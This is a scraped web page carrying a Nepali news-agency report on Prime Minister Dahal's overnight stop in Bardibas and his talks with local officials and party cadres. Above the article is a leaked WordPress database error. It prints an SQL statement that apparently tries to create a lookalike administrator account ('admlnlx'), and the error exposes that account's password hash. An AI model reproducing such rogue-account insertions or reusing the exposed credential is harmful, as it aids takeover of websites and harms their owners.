WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BgY5sh6r0pqnz.Pk3p9zgoA.ouj/Fz.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 07:48:49', '', 'admlnlx', 'admlnlx')
बर्दिवास, मंसिर २९ –
प्रधानमन्त्री पुष्पकमल दाहालले महोत्तरी जिल्लाको सुरक्षा, विकास पूर्वाधार र अहिलेको जनचासोबारे जानकारी लिनुभएको छ ।
मङ्गलबार साँझ महोत्तरीको बर्दिवास आइपुग्नुभएका प्रधानमन्त्री दाहालले जिल्लाका सुरक्षा अधिकारी र नेकपा ९माओवादी केन्द्र०का स्थानीय नेता कार्यकर्तासँगको कुराकानीमा जिल्लाका समस्या र अवस्थाबारे जानकारी लिनुभएको हो ।
रात्रिबास बर्दिवास नै बस्नुभएका प्रधानमन्त्री दाहालले मङ्गलबार साँझ जिल्लाका प्रजिअ, अन्य सुरक्षा अधिकारी र नेकपा ९माओवादी केन्द्र०का स्थानीय नेता कार्यकर्तासँग छुट्टाछुट्टै सङ्क्षिप्त कुराकानी गर्नुभएको थियो । प्रधानमन्त्रीले जिल्लाको राजनीतिक र विकास अवस्थाबारे चासो लिनुभएको नेकपा ९माओवादी केन्द्र०का नेता बर्दिवास–१ का बासिन्दा राजु खड्काले जानकारी दिनुभयो ।
आफ्ना मित्र मातृकाप्रसाद यादवका छोराको विवाहमा सरिक हुन र सिरहाको मिर्चैयामा राजनीतिक कामको सिलसिलामा सडक मार्ग हुँदै प्रधानमन्त्री दाहाल मङ्गलबार साँझ बर्दिवास आइपुग्नुभएको हो ।
प्रधानमन्त्री दाहाल बाक्लो हुस्सु लागिरहेकाले सडक मार्गबाट आउनु परेको सुरक्षा अधिकारीले बताएका छन् । प्रधानमन्त्री दाहाल आज बिहानै विवाह समारोहमा सरिक हुन सिरहातर्फ प्रस्थान गर्नुभएको छ । – रासस